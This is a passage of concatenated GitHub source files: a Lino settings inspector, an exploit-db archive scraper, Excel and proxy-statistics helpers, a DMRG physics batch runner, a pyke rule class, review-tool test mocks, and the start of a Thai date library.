settings\n try:\n o = eval('settings.' + name)\n except Exception as e:\n o = e\n return o\n\n\n @classmethod\n def get_data_rows(self, ar):\n # dd.logger.info(\"20120210 %s, %s\",ar.quick_search,ar.param_values.inspected)\n\n if ar.param_values.show_callables:\n def flt(v):\n return True\n else:\n def flt(v):\n if isinstance(v, (\n types.FunctionType,\n types.GeneratorType,\n types.UnboundMethodType,\n types.UnboundMethodType,\n types.BuiltinMethodType,\n types.BuiltinFunctionType\n )):\n return False\n return True\n\n o = self.get_inspected(ar.param_values.inspected)\n # print(20170207, o)\n\n if isinstance(o, (list, tuple)):\n for i, v in enumerate(o):\n k = \"[\" + str(i) + \"]\"\n yield Inspected(o, '', k, v)\n elif isinstance(o, AttrDict):\n for k, v in list(o.items()):\n yield Inspected(o, '.', k, v)\n elif isinstance(o, dict):\n for k, v in list(o.items()):\n k = \"[\" + repr(k) + \"]\"\n yield Inspected(o, '', k, v)\n elif isinstance(o, type) and issubclass(o, models.Model):\n for fld in o._meta.get_fields():\n k = \"._meta.get_field('\" + fld.name + \"')\"\n yield Inspected(o, '', fld.name, fld)\n else:\n for k in dir(o):\n if not k.startswith('__'):\n if not ar.quick_search or (\n ar.quick_search.lower() in k.lower()):\n v = getattr(o, k)\n if flt(v):\n # if not inspect.isbuiltin(v) and not inspect.ismethod(v):\n # if ar.param_values.show_callables or not inspect.isfunction(v):\n # if isinstance(v,types.FunctionType ar.param_values.show_callables or not callable(v):\n yield Inspected(o, '.', k, v)\n # for k,v in o.__dict__.items():\n # yield Inspected(o,k,v)\n\n @dd.displayfield(_(\"Name\"))\n def i_name(self, obj, ar):\n pv = dict()\n if ar.param_values.inspected:\n pv.update(inspected=ar.param_values.inspected +\n obj.prefix + obj.name)\n else:\n pv.update(inspected=obj.name)\n # newreq = ar.spawn(ar.ui,user=ar.user,renderer=ar.renderer,param_values=pv)\n # newreq = ar.spawn_request(param_values=pv)\n # return ar.href_to_request(newreq, obj.name)\n return obj.name\n\n @dd.displayfield(_(\"Value\"))\n def i_value(self, obj, ar):\n return escape(str(obj.value), quote=False)\n\n @dd.displayfield(_(\"Type\"))\n def i_type(self, obj, ar):\n return escape(str(type(obj.value)), quote=False)\n\n\nclass SourceFiles(dd.VirtualTable):\n label = _(\"Source files\")\n column_names = 'module_name code_lines doc_lines'\n\n @classmethod\n def get_data_rows(self, ar):\n for name, filename in codefiles('lino*'):\n yield SourceFile(name, filename)\n\n @dd.virtualfield(models.IntegerField(_(\"Code\")))\n def code_lines(self, obj, ar):\n return obj.count_code\n\n @dd.virtualfield(models.IntegerField(_(\"doc\")))\n def doc_lines(self, obj, ar):\n return obj.count_doc\n\n @dd.virtualfield(models.CharField(_(\"module name\")))\n def module_name(self, obj, ar):\n return obj.modulename\n","repo_name":"lino-framework/xl","sub_path":"lino_xl/lib/inspect/desktop.py","file_name":"desktop.py","file_ext":"py","file_size_in_byte":7776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21607584986","text":"# -*- coding: utf-8 -*-\n# @Author: bunny\n# @Date: 2016-03-23 13:37:10\n# @Last Modified by: bunny\n# @Last Modified time: 2016-03-29 12:13:28\nimport urllib2\nimport re\nfrom BeautifulSoup import BeautifulSoup\nimport datetime\n\ndef seebug():\n all = []\n userMainUrl = \"https://www.exploit-db.com/webapps/\"\n req = urllib2.Request(userMainUrl)\n resp = urllib2.urlopen(req)\n respHtml = resp.read()\n songtasteHtmlEncoding = \"UTF-8\"\n soup = BeautifulSoup(respHtml,fromEncoding=songtasteHtmlEncoding).tbody\n for soup1 in soup.contents:\n if not soup1 == '\\n':\n vulnsdate = soup1.find(attrs={\"class\":\"date\"})\n dlink1 = soup1.find(attrs={\"class\":\"dlink\"})\n app1 = soup1.find(attrs={\"class\":\"app\"})\n description1 = soup1.find(attrs={\"class\":\"description\"})\n if(vulnsdate):\n date1 = vulnsdate.string.replace('\\t','').replace('\\n','').replace(' ','')\n date2 = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n if date1 == date2:\n description = description1.a.string.replace('/','')\n dlink = dlink1.a['href']\n app = \"https://www.exploit-db.com\" + str(app1.a['href'])\n all.append((description,dlink,app)) \n return all\n \ndef main():\n all = seebug()\n for description,dlink,app in all:\n file = urllib2.urlopen(dlink)\n data = file.read()\n with open(\"/Users/bunny/Dropbox/seebug/\" + description + \".txt\", \"wb\") as code: \n code.write(data)\n file1 = urllib2.urlopen(app)\n data1 = file1.read()\n with open(\"/Users/bunny/Dropbox/app/\" + description + \".zip\", \"wb\") as code:\n code.write(data1)\n\nif __name__ == '__main__':\n main()\n","repo_name":"LubyRuffy/my_script_tool","sub_path":"seebug.py","file_name":"seebug.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72435157289","text":"import os\n\nimport pandas as pd\n\n\ndef excel_find_row(date, path):\n dates = date.split('.')\n month = dates[1]\n day = dates[2]\n demo_df = pd.read_excel(f'{path}/(周莹莹)聚英-2022年银行日记账2022.5.10.xlsx')\n for indexs in demo_df.index:\n for i in range(len(demo_df.loc[indexs].values)):\n if (str(demo_df.loc[indexs].values[i]) == month and str(demo_df.loc[indexs].values[i + 1]) == day):\n row = (int)(str(indexs - 1).rstrip('L'))\n return row\n\n\ndef excel_print(excelAdd, row_num):\n result = pd.read_excel(excelAdd)\n name = result.columns[0]\n print(name)\n result = pd.read_excel(excelAdd, header=1)\n data = result.iloc[row_num:row_num + 1]\n print(data[0:8])\n print()\n\n\ndef excel_print2(excelAdd, row_num):\n result = pd.read_excel(excelAdd)\n name = result.columns[0]\n result = pd.read_excel(excelAdd, header=1)\n data = result.iloc[row_num:row_num + 1]\n # print(result.columns[0:6])\n sum = {'name': name,\n 'data': data}\n return sum\n\n\ndef excel_new(date):\n nan_excel = pd.DataFrame()\n new_name = f'银行余额表汇总{date}'\n # nan_excel.to_excel(new_name)\n # writer = pd.ExcelWriter(f'银行余额表{date}')\n # writer.save()\n # writer.close()\n\n\ndef excel_dos(find_date, excelname_date, path):\n file_list = os.listdir(path)\n file_list.sort()\n fileNum = len(file_list)\n row_num = excel_find_row(find_date, path)\n print(\"在该目录下有%d个xlsx文件,只合并含记账日期的文件\" % fileNum)\n\n for file in file_list:\n if '~$' not in file and excelname_date in file: # 打开的文件和不含日期的文件均不在处理之列\n excelAdd = os.path.join(path, file)\n else:\n continue\n excel_print(excelAdd, row_num)\n\n\nif __name__ == '__main__':\n find_date = '2022.5.6' # 需要计算的日期\n excelname_date = '2022.5.10' # excel文件名上的日期\n # find_date = excelname_date\n path = 'linlin/银行余额自动更新测试/'\n excel_dos(find_date, excelname_date, path)\n","repo_name":"zhaotong2027/test-excel-conformity","sub_path":"linlin/ExcelRead.py","file_name":"ExcelRead.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21949572862","text":"import logging\nfrom contracts.enums import Response, ProxyType, Provider\nfrom contracts.proxy import Proxy\n\n\nclass ProxyHelper:\n\n @staticmethod\n def create_and_log_proxy_stats(proxies, task_results, provider_id):\n proxy_records = set()\n http_c = http_ssl_c = socks4_c = socks5_c = 0\n\n for t in task_results:\n\n if t.result_type is Response.SUCCESS:\n if t.type_id is ProxyType.HTTP.value:\n if t.ssl is False:\n http_c += 1\n else:\n http_ssl_c += 1\n elif t.type_id is ProxyType.SOCKS4.value:\n socks4_c += 1\n elif t.type_id is ProxyType.SOCKS5.value:\n socks5_c += 1\n\n proxy_records.add(Proxy(address=t.address, port=t.port, country_code=t.country_code,\n provider_id=provider_id,\n access_type_id=t.access_type_id, type_id=t.type_id, speed=t.speed,\n uptime=t.uptime))\n\n logging.info(f'Successful: {len(proxy_records)}/{len(task_results)}\\n'\n f'HTTP => [{http_c}/{len(proxies[0])}]\\n'\n f'HTTP SSL => [{http_ssl_c}/{len(proxies[1])}]\\n'\n f'SOCKS4 => [{socks4_c}/{len(proxies[2])}]\\n'\n f'SOCKS5 => [{socks5_c}/{len(proxies[3])}]')\n\n return proxy_records\n","repo_name":"bokklu/proxy-scraper-checker","sub_path":"src/utils/proxy_helper.py","file_name":"proxy_helper.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36353323061","text":"__author__ = 'Abuenameh'\n\nimport sys\nimport numpy as np\nimport itertools\nimport concurrent.futures\nimport datetime\nimport threading\nimport os\nimport tempfile\nimport shutil\nimport subprocess\nimport time\nfrom mathematica import mathformat, timedeltaformat\nfrom switch import switch\nfrom subprocess import PIPE, Popen\n\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\nnumthreads = 15\n\nL = 50\nnmax = 7\n\nU = 1\n\nnsweeps = 5\nerrgoal = 1e-16\n\nmaxm = [20, 20, 100, 100, 200]\nminm = [20]\ncutoff = [1e-10]\nniter = [4, 3, 2]\nnoise = [1e-6, 1e-7, 1e-8, 0]\n\nmaxm += [maxm[-1]] * (nsweeps - len(maxm))\nminm += [minm[-1]] * (nsweeps - len(minm))\ncutoff += [cutoff[-1]] * (nsweeps - len(cutoff))\nniter += [niter[-1]] * (nsweeps - len(niter))\nnoise += [noise[-1]] * (nsweeps - len(noise))\n\nmaxm = [str(i) for i in maxm]\nminm = [str(i) for i in minm]\ncutoff = [str(i) for i in cutoff]\nniter = [str(i) for i in niter]\nnoise = [str(i) for i in noise]\n\nquiet = 'yes'\n\nseed = 100\nneigen = 1\n\nif len(sys.argv) < 4:\n print('Insufficient number of command line arguments.')\n quit(1)\n\ndelta = float(sys.argv[2])\n\nif delta > 0:\n np.random.seed(int(sys.argv[3]))\n mu = delta*2*np.random.random(L) - delta\n # mu = [0.0244067519637,0.107594683186,0.0513816880358,0.0224415914984,-0.0381726003305,0.0729470565333,-0.0312063943687,0.195886500391,0.231831380251,-0.0582792405871,0.145862519041,0.0144474598765]\n mustr = \",\".join([str(mui) for mui in mu])\nelse:\n mu = 0\n mustr = str(mu)\n\nsweepsTable = 'maxm minm cutoff niter noise\\n'\nfor row in zip(maxm, minm, cutoff, niter, noise):\n sweepsTable += ' '.join(row) + '\\n'\n\nparametersString = '''\nparameters {{{{\n L = {0}\n nmax = {1}\n nsweeps = {2}\n errgoal = {3}\n\n sweeps {{{{\n {4}\n }}}}\n\n quiet = {5}\n\n t = {{0}}\n N = {{1}}\n U = {{2}}\n mu = {{3}}\n}}}}\n'''.format(L, nmax, nsweeps, errgoal, sweepsTable, quiet)\n\nif sys.platform == 'darwin':\n appdir = '/Users/Abuenameh/Projects/ITensorDMRG/Release/'\nelif sys.platform == 'win32':\n appdir = 'C:/Users/abuenameh/Documents/Projects/ITensorDMRG/Release/'\nelif sys.platform == 'linux2':\n appdir = '/home/ubuntu/ITensorDMRG/Release/'\n\nif sys.platform == 'darwin':\n bhdir = '/tmp/BH-DMRG'\nelif sys.platform == 'linux2':\n bhdir = '/mnt/BH-DMRG'\nelif sys.platform == 'win32':\n bhdir = tempfile.mkdtemp()\n\nif not os.path.isdir(bhdir):\n os.makedirs(bhdir)\n\ndef rundmrg(it, t, iN, N):\n inputFile = open('itensor.{0}.{1}.in'.format(it, iN), 'w')\n inputFile.write(parametersString.format(t, N, U, mustr))\n inputFile.close()\n outputFileName = 'itensor.{0}.{1}.out'.format(it, iN)\n # print(subprocess.list2cmdline([appdir + 'ITensorDMRG', inputFile.name]))\n subprocess.call(subprocess.list2cmdline([appdir + 'ITensorDMRG', 'run', 'setup.dat', inputFile.name, outputFileName]), shell=True)\n\ndef pad(a, size, v):\n l = len(a)\n return np.concatenate((a,[v]*(size-l)))\n\ndef run(pipe):\n ts = np.linspace(0.01, 0.3, 15).tolist()\n # ti = int(sys.argv[5])\n # if ti >= 0:\n # ts = [ts[ti]]\n Ns = range(1, 2 * L + 1, 1)\n ts = np.linspace(0.01, 0.3, 5).tolist()\n # Ns = [4]\n # Ns = range(1, 5, 1)\n\n dims = [len(ts), len(Ns)]\n Edims = dims + [nsweeps]\n ndims = dims + [L]\n Cdims = dims + [L, L]\n\n trunc = np.zeros(dims)\n E0res = np.zeros(dims)\n runtimeres = np.zeros(dims)\n Eires = np.zeros(Edims)\n nres = np.zeros(ndims)\n n2res = np.zeros(ndims)\n Cres = np.zeros(Cdims)\n cres = np.zeros(Cdims)\n\n trunc.fill(np.NaN)\n E0res.fill(np.NaN)\n runtimeres.fill(np.NaN)\n Eires.fill(np.NaN)\n nres.fill(np.NaN)\n n2res.fill(np.NaN)\n Cres.fill(np.NaN)\n cres.fill(np.NaN)\n\n start = datetime.datetime.now()\n\n subprocess.call(subprocess.list2cmdline([appdir + 'ITensorDMRG', 'setup', 'setup.dat', str(L), str(nmax)]), shell=True)\n\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=numthreads) as executor:\n futures = [executor.submit(rundmrg, it, t, iN, N) for (it, t), (iN, N) in\n itertools.product(enumerate(ts), enumerate(Ns))]\n pickle.dump(len(futures), pipe)\n for future in concurrent.futures.as_completed(futures):\n pickle.dump(1, pipe)\n\n for it, iN in itertools.product(range(len(ts)), range(len(Ns))):\n try:\n outputFile = open('itensor.{0}.{1}.out'.format(it, iN), 'r')\n for line in outputFile:\n lineSplit = line.split()\n obs = lineSplit[0]\n val = np.array([float(s) for s in lineSplit[1:]])\n for case in switch(obs):\n if case('Ei'):\n Eires[it][iN] = pad(val, nsweeps, np.NaN)\n break\n if case('E0'):\n E0res[it][iN] = val[0]\n break\n if case('n'):\n nres[it][iN] = val\n break\n if case('n2'):\n n2res[it][iN] = val\n break\n if case('C'):\n Cres[it][iN] = np.split(val,L)\n break\n if case('runtime'):\n runtimeres[it][iN] = val[0]\n break\n outputFile.close()\n except Exception as e:\n print(e.message)\n\n\n end = datetime.datetime.now()\n\n resi = sys.argv[1]\n if sys.platform == 'darwin':\n resfile = '/Users/Abuenameh/Documents/Simulation Results/BH-ITensor-DMRG/res.' + str(resi) + '.txt'\n elif sys.platform == 'linux2':\n resfile = '/home/ubuntu/Dropbox/Amazon EC2/Simulation Results/BH-ITensor-DMRG/res.' + str(resi) + '.txt'\n elif sys.platform == 'win32':\n resfile = 'C:/Users/abuenameh/Dropbox/Server/BH-ITensor-DMRG/res.' + str(resi) + '.txt'\n if not os.path.isdir(os.path.dirname(resfile)):\n os.makedirs(os.path.dirname(resfile))\n resf = open(resfile, 'w')\n res = ''\n res += 'delta[{0}]={1};\\n'.format(resi, delta)\n res += 'Lres[{0}]={1};\\n'.format(resi, L)\n res += 'nsweeps[{0}]={1};\\n'.format(resi, nsweeps)\n res += 'errgoal[{0}]={1};\\n'.format(resi, mathformat(errgoal))\n res += 'maxm[{0}]={1};\\n'.format(resi, mathformat(maxm))\n res += 'minm[{0}]={1};\\n'.format(resi, mathformat(minm))\n res += 'cutoff[{0}]={1};\\n'.format(resi, mathformat(cutoff))\n res += 'niter[{0}]={1};\\n'.format(resi, mathformat(niter))\n res += 'noise[{0}]={1};\\n'.format(resi, mathformat(noise))\n res += 'nmax[{0}]={1};\\n'.format(resi, nmax)\n res += 'Nres[{0}]={1};\\n'.format(resi, mathformat(Ns))\n res += 'tres[{0}]={1};\\n'.format(resi, mathformat(ts))\n res += 'mures[{0}]={1};\\n'.format(resi, mathformat(mu))\n res += 'Eires[{0}]={1};\\n'.format(resi, mathformat(Eires))\n res += 'E0res[{0}]={1};\\n'.format(resi, mathformat(E0res))\n res += 'nres[{0}]={1};\\n'.format(resi, mathformat(nres))\n res += 'n2res[{0}]={1};\\n'.format(resi, mathformat(n2res))\n res += 'Cres[{0}]={1};\\n'.format(resi, mathformat(Cres))\n try:\n res += 'runtimei[{0}]={1};\\n'.format(resi, timedeltaformat(runtimeres))\n except Exception as e:\n print(e.message)\n res += 'runtime[{0}]=\\\"{1}\\\";\\n'.format(resi, end - start)\n resf.write(res)\n\n\nif __name__ == '__main__':\n os.chdir(bhdir)\n [os.remove(f) for f in os.listdir(\".\")]\n proc = Popen(['python', os.path.dirname(os.path.realpath(__file__)) + '/ProgressDialog.py'], stdin=PIPE)\n pipe = proc.stdin\n run(pipe)\n proc.terminate()\n if sys.platform == 'win32':\n os.chdir(os.path.expanduser('~'))\n shutil.rmtree(bhdir)\n","repo_name":"Abuenameh/BH-DMRG","sub_path":"BH-ITensor.py","file_name":"BH-ITensor.py","file_ext":"py","file_size_in_byte":7682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8715918740","text":"#/usr/bin/env python3\n#coding=utf8\n\nimport configparser\nimport os\n\nconfigfile = os.environ[\"HOME\"] + \"/.translate2markdown/config.conf\"\ndefaultstoragepath = os.environ[\"HOME\"] + \"/Translate2markdown\"\n\n\nif(not os.path.exists(configfile)):\n os.makedirs(os.path.dirname(configfile),exist_ok=True)\n os.makedirs(defaultstoragepath, exist_ok=True)\n with open(configfile,\"w\") as f:\n f.write('''[global]\nautosave = True\nstoragePath = %s\n''' % defaultstoragepath)\n f.close()\n \nparser = configparser.ConfigParser()\nparser.read(configfile)\n\ndef isAutoSave():\n return True if(parser.get(\"global\", \"autosave\")) == \"True\" else False\n\ndef setAutoSave(autosave):\n parser.set(\"global\",\"autosave\", value=\"True\" if(autosave) else \"False\")\n with open(configfile,\"w\") as f:\n parser.write(f)\n f.close()\n\ndef getStoragePath():\n return parser.get(\"global\", \"storagePath\")\n\ndef setStoragePath(path):\n parser.set(\"global\", \"storagePath\", path)\n with open(configfile,\"w\") as f:\n parser.write(f)\n f.close()\n\n\n","repo_name":"camark/Translate2Markdown","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5322806602","text":"import functools\nfrom pyke import fc_rule, immutable_dict\n\nclass bc_rule(fc_rule.rule):\n ''' This represents a single backward-chaining rule. Most of its\n behavior is inherited.\n '''\n def __init__(self, name, rule_base, goal_name, bc_fn, plan_fn,\n goal_arg_patterns, plan_vars, patterns):\n super(bc_rule, self).__init__(name, rule_base, patterns)\n self.goal_name = goal_name\n self.orig_bc_fn = bc_fn\n self.bc_fn = bc_fn\n self.plan_fn = plan_fn\n self.goal_arg_pats = goal_arg_patterns\n self.plan_vars = plan_vars\n rule_base.add_bc_rule(self)\n\n def goal_arg_patterns(self):\n return self.goal_arg_pats\n\n def make_plan(self, context, final):\n return functools.partial(self.plan_fn,\n immutable_dict.immutable_dict(\n (var_name, context.lookup_data(var_name, final=final))\n for var_name in self.plan_vars))\n\n def trace(self):\n self.bc_fn = self.surrogate\n\n def surrogate(self, rule, arg_patterns, arg_context):\n print(\"%s.%s%s\" % (rule.rule_base.root_name, rule.name,\n tuple(arg.as_data(arg_context, True)\n for arg in arg_patterns)))\n for prototype_plan in self.orig_bc_fn(rule, arg_patterns, arg_context):\n print(\"%s.%s succeeded with %s\" % \\\n (rule.rule_base.root_name, rule.name,\n tuple(arg.as_data(arg_context, True)\n for arg in arg_patterns)))\n yield prototype_plan\n print(\"%s.%s failed\" % (rule.rule_base.root_name, rule.name))\n\n def untrace(self):\n self.bc_fn = self.orig_bc_fn\n\n","repo_name":"nvitucci/pyke","sub_path":"pyke/bc_rule.py","file_name":"bc_rule.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"17959011663","text":"from .common import Common\n\n\nclass TestFsmLocation(Common):\n def test_project_count(self):\n location = self.location\n project = self.project\n self.assertEqual(location.project_count, 0)\n project.write({\"fsm_location_id\": location.id})\n location.invalidate_model()\n self.assertEqual(location.project_count, 1)\n\n def test_action_view_project(self):\n location = self.location\n project = self.project\n action = location.action_view_project()\n action_domain = action.get(\"domain\")\n res_id = action.get(\"res_id\")\n self.assertEqual(action_domain, [(\"id\", \"in\", [])])\n self.assertFalse(res_id)\n project.write({\"fsm_location_id\": location.id})\n action = location.action_view_project()\n res_id = action.get(\"res_id\")\n self.assertEqual(res_id, project.id)\n","repo_name":"OCA/field-service","sub_path":"fieldservice_project/tests/test_fsm_location.py","file_name":"test_fsm_location.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"53"} +{"seq_id":"37750565509","text":"from os.path import join, dirname\nimport yaml\nimport github\nimport gitlab\nfrom github.GithubException import UnknownObjectException\nfrom gitlab.exceptions import GitlabGetError\nfrom collections import namedtuple\nimport datetime\nfrom reviewrot.basereview import LastComment\nfrom reviewrot.phabricatorstack import PhabricatorReview\n\n\nwith open(join(dirname(__file__), \"test_githubtest.yaml\"), \"r\") as f:\n github_config = yaml.safe_load(f)\n\nwith open(join(dirname(__file__), \"test_gitlabtest.yaml\"), \"r\") as f:\n gitlab_config = yaml.safe_load(f)\n\n# github\n\n\ndef mock_get_user(user_name):\n raise UnknownObjectException(\"param1\", \"param2\")\n\n\ndef mock_get_user_(user_name):\n res = github.NamedUser.NamedUser(\n \"param1\", \"param2\", {\"login\": user_name}, \"param3\"\n )\n return res\n\n\ndef mock_get_repos():\n repo = github.Repository.Repository(\"param1\", \"param2\", \"param3\", \"param4\")\n res = []\n res.append(repo)\n return res\n\n\ndef mock_github_get_reviews(\n uname,\n repo_name,\n age=None,\n show_last_comment=None,\n):\n msg = [github_config[\"msg\"]]\n return msg\n\n\ndef mock_get_repo(repo_name):\n raise UnknownObjectException(\"args\", \"kwargs\")\n\n\ndef mock_get_repo_(repo_name):\n repo = github.Repository.Repository(\"param1\", \"param2\", \"param3\", \"param4\")\n return repo\n\n\ndef mock_get_pulls():\n return []\n\n\n# for mocking user in comments\nUser = namedtuple(\"User\", (\"login\"))\n\n\nclass FakeGithubComment:\n \"\"\"\n Mock comments in pull requests\n \"\"\"\n\n def __init__(self, author, body, created_at):\n self.user = User(login=author)\n self.body = body\n self.created_at = created_at\n\n\nclass FakeGithubPaginatedList:\n \"\"\"\n Mocks PaginatedList containing comments\n \"\"\"\n\n def __init__(self, comments):\n self.comments = comments\n self.totalCount = len(comments)\n\n @property\n def reversed(self):\n return list(reversed(self.comments))\n\n\n# gitlab\n\n\ndef mock_projects_get(user_name, repo_name):\n return GitlabGetError()\n\n\ndef mock_projects_get_():\n return gitlab.Gitlab.projects.create({\"name\": \"project\"})\n\n\ndef mock_auth():\n return True\n\n\ndef mock_groups_search(user_name):\n return []\n\n\ndef mock_gitlab_get_reviews(\n uname,\n project,\n age=None,\n show_last_comment=None,\n):\n msg = [gitlab_config[\"msg\"]]\n return msg\n\n\nclass FakeProjectMergeRequestNote:\n \"\"\"\n Mocks discussion note in merge requests\n \"\"\"\n\n def __init__(self, system, author, created_at, body):\n self.system = system\n self.author = {\"username\": author}\n self.created_at = created_at\n self.body = body\n\n\n# Phabricator\n\ndef mock_phabricator_differential_query(status, responsibleUsers, phab):\n class MockResponse:\n def __init__(self, json_data, status):\n self.json_data = json_data\n self.status = status\n\n def json(self):\n return self.json_data\n\n def next(self):\n return\n\n def getresponse(self):\n return self.json_data\n\n res = [\n {\n 'reviewers': [\n 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'PHID-USER-xxxxxxxxxxxxxxxxxxxx'\n ],\n 'lineCount': '2',\n 'repositoryPHID': None,\n 'id': 1706,\n 'authorPHID': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'title': 'Title 1',\n 'activeDiffPHID': 'PHID-DIFF-xxxxxxxxxxxxxxxxxxxx',\n 'branch': 'new_input_data',\n 'dateModified': '1553524722',\n 'status': '2',\n 'testPlan': '',\n 'commits': [],\n 'dateCreated': '1553065630',\n 'hashes': [],\n 'properties': [],\n 'diffs': [\n '3605',\n '3599'\n ],\n 'phid': 'PHID-DREV-xxxxxxxxxxxxxxxxxxxx',\n 'uri': 'dummy.url',\n 'css': [],\n 'summary': 'This is a summary.',\n 'statusName': 'Accepted'\n },\n ]\n return res\n\n\ndef mock_phabricator_get_comments(id, phab):\n return [\n {\n 'action': 'comment',\n 'authorPHID': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'revisionID': id,\n 'content': 'This is some content',\n 'dateCreated': '1551763640'\n }\n ]\n\ndef mock_phabricator_get_comments_(id, phab):\n return [\n {\n 'action': 'comment',\n 'authorPHID': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'revisionID': id,\n 'content': 'This is some content',\n 'dateCreated': '1551763640'\n },\n {\n 'action': 'comment',\n 'authorPHID': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'revisionID': id,\n 'content': 'This is some content',\n 'dateCreated': '1551763640'\n },\n {\n 'action': 'comment',\n 'authorPHID': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'revisionID': id,\n 'content': 'This is some content',\n 'dateCreated': '1551763640'\n }\n ]\n\n\ndef mock_phabricator_get_reviews(phab, reviews, host, age, show_last_comment,\n raw_response):\n res = []\n date_created = datetime.datetime.strptime('16Sep2012', '%d%b%Y')\n date_modified = datetime.datetime.strptime('16Sep2012', '%d%b%Y')\n last_comment = LastComment(author='user_name',\n body='content',\n created_at=date_modified)\n temp = PhabricatorReview(user='user_name',\n title='Title 1',\n url='dummy.url',\n time=date_created,\n updated_time=date_modified,\n comments=2,\n image='https://authorImage.com',\n last_comment=last_comment,\n project_name='Phabricator',\n project_url='www.google.com')\n res.append(temp)\n return res\n\n\ndef mock_phabricator_get_last_comment(comments, phab, raw_response):\n createdAt = datetime.datetime.strptime('16Sep2018', '%d%b%Y')\n return LastComment(author='user_name',\n body='This is some content',\n created_at=createdAt)\n\n\ndef mock_phabricator_user_query_ids(phids, phab):\n return [\n {\n 'userName': 'dummy_user',\n 'phid': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'realName': 'Dummy User',\n 'roles': [\n 'verified', 'approved', 'activated'\n ],\n 'image': 'userimage.com',\n 'uri': 'userurl.com'\n }\n ]\n\ndef mock_phabricator_author_data(author_phid, raw_response, phab):\n user = {\n 'userName': 'dummy_user',\n 'phid': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'realName': 'Dummy User',\n 'roles': [\n 'verified', 'approved', 'activated'\n ],\n 'image': 'userimage.com',\n 'uri': 'userurl.com'\n }\n\n raw_response = [\n {\n 'userName': 'dummy_user',\n 'phid': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'realName': 'Dummy User',\n 'roles': [\n 'verified', 'approved', 'activated'\n ],\n 'image': 'userimage.com',\n 'uri': 'userurl.com'\n }\n ]\n return user, raw_response\n\n\ndef mock_phabricator_user_serach(username, phab):\n return {\n 'cursor': {\n 'after': None,\n 'limit': 100,\n 'order': None,\n 'before': None\n },\n 'maps': {},\n 'data': [\n {\n 'fields': {\n 'username': 'dummyuser',\n 'realName': 'Dummy User',\n 'roles': [\n 'verified',\n 'approved',\n 'activated'],\n 'dateCreated': 1509530187,\n 'policy': {\n 'edit': 'no-one',\n 'view': 'public'},\n 'dateModified': 1509530333},\n 'phid': 'PHID-USER-xxxxxxxxxxxxxxxxxxxx',\n 'type': 'USER',\n 'id': 86,\n 'attachments': {}}],\n 'query': {\n 'queryKey': None\n }\n }\n\ndef mock_phabricator_raw_response():\n return [\n {\n 'userName': 'user1',\n 'phid': 'PHID-USER-xxxxxxxxxxxxxxxxxx',\n 'realName': 'user 1',\n 'roles': [\n 'verified',\n 'approved',\n 'activated'\n ],\n 'image': 'user1.image',\n 'uri': 'user1.url'\n },\n {\n 'userName': 'user2',\n 'phid': 'PHID-USER-xxxxxxxxxxxxxxxxxx',\n 'realName': 'user 2',\n 'roles': [\n 'verified',\n 'approved',\n 'activated'\n ],\n 'image': 'user2.image',\n 'uri': 'user2.url'\n },\n {\n 'userName': 'user3',\n 'phid': 'PHID-USER-test',\n 'realName': 'user 3',\n 'roles': [\n 'verified',\n 'approved',\n 'activated'\n ],\n 'image': 'user3.image',\n 'uri': 'user3.url'\n }\n ]\n\ndef mock_phabricator_update_interfaces():\n return\n\ndef mock_phabricator_time_from_epoch(epoch_time):\n return datetime.datetime.strptime('16Sep2012', '%d%b%Y')\n\n\nclass FakeReview:\n \"\"\"\n Mocks small part of BaseReview\n \"\"\"\n\n def __init__(self, title):\n self.title = title\n","repo_name":"sidpremkumar/review-rot","sub_path":"test/test_mock.py","file_name":"test_mock.py","file_ext":"py","file_size_in_byte":10180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"4509805151","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLibrary to manage everything about date and time.\n\"\"\"\n\n__version__ = \"1.0.1\"\n__author__ = \"Sorawee Porncharoenwase\"\n\nimport sys, datetime\n\ndef wrapMonth(m):\n \"\"\"Convert zero-based month number to zero-based month number.\"\"\"\n m -= 1\n if m < 0:\n m += 12\n if m >= 12:\n m -= 12\n return m\n\ndef weekdayThai(d):\n \"\"\"Return Thai name of days of the week.\"\"\"\n return map(lambda x: u\"วัน\" + x, \n [u\"จันทร์\", u\"อังคาร\", u\"พุธ\", u\"พฤหัสบดี\", u\"ศุกร์\",\n u\"เสาร์\", u\"อาทิตย์\"])[d]\n\ndef monthEng(m):\n \"\"\"Return English name of month.\"\"\"\n return [u\"January\", u\"February\", u\"March\", u\"April\", u\"May\", u\"June\", \n u\"July\", u\"August\", u\"September\", u\"October\", u\"November\",\n u\"December\"][wrapMonth(m)]\n\ndef monthThai(m):\n \"\"\"Return Thai name of month.\"\"\"\n return [u\"มกราคม\", u\"กุมภาพันธ์\", u\"มีนาคม\", u\"เมษายน\", u\"พฤษภาคม\",\n 